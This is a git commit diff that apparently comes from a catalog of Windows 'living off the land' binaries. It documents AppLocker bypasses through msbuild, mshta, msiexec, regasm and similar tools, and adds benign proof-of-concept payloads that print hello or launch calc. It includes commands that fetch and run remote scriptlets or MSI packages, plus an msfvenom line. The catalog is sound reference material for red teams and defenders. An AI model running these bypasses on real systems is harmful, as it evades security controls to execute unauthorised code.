Added some more adjustments

master
api0cradle 2018-04-18 23:12:38 +02:00
parent ddc1173e45
commit 1a0eb4edc7
9 changed files with 243 additions and 10 deletions

View File

@ -4,10 +4,37 @@
``` ```
msbuild.exe pshell.xml msbuild.exe pshell.xml
msbuild.exe Msbuild.csproj
``` ```
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * Casey Smith - @subtee
* Cn33liz - @Cneelis
Code sample:
* [Msbuild.csproj](Payload/Msbuild.csproj)
Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
* https://github.com/Cn33liz/MSBuildShell
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
```
Notes:
Example code borrowed from Red Canary - Atomic Red Team.

View File

@ -9,7 +9,19 @@ Open .diagcab package
Acknowledgements: Acknowledgements:
* ? * ?
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources: Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Full path:
```
C:\Windows\System32\Msdt.exe
C:\Windows\SysWOW64\Msdt.exe
```
Notes:

View File

@ -4,7 +4,30 @@
``` ```
mshta.exe evilfile.hta mshta.exe evilfile.hta
mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
``` ```
Acknowledgements: Acknowledgements:
* ? * Casey Smith - @subtee
Code sample:
* [Mshta_calc.sct](Payload/Mshta_calc.sct)
Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Full path:
```
C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe
```
Notes:
SCT code borrowed from Red Canary - Atomic Red Team

View File

@ -8,4 +8,25 @@ msiexec /q /i http://192.168.100.3/tmp/cmd.png
``` ```
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * ? - @netbiosX
Code sample:
*
Resources:
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
Full path:
```
c:\windows\system32\msiexec.exe
c:\windows\sysWOW64\msiexec.exe
```
Notes:
Generate MSI file:
```
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
```

View File

@ -9,3 +9,21 @@ odbcconf -f file.rsp
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * Casey Smith - @subtee
* Nick Tyrer - @NickTyrer * Nick Tyrer - @NickTyrer
Code sample:
*
Resources:
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
* https://github.com/woanware/application-restriction-bypasses
Full path:
```
c:\windows\system32\odbcconf.exe
c:\windows\sysWOW64\odbcconf.exe
```
Notes:
Samples can be found in the resources.

View File

@ -0,0 +1,47 @@
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From a Code Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<!-- <Reference Include="System.IO" /> Example Include -->
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
Console.WriteLine("Hello From a Class.");
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>

View File

@ -0,0 +1,43 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
<!-- DFIR -->
<!-- .sct files are downloaded and executed from a path like this -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
}
]]>
</script>
</scriptlet>

View File

@ -8,3 +8,24 @@ Presentationhost.exe C:\temp\Evil.xbap
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * Casey Smith - @subtee
Code sample:
*
Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Full path:
```
c:\windows\system32\PresentationHost.exe
c:\windows\sysWOW64\PresentationHost.exe
```
Notes:

View File

@ -3,10 +3,31 @@
* Functions: Execute * Functions: Execute
``` ```
regasm.exe /U regsvcs.dll regasm.exe /U AllTheThings.dll
regasm.exe regsvcs.dll
``` ```
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * Casey Smith - @subtee
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team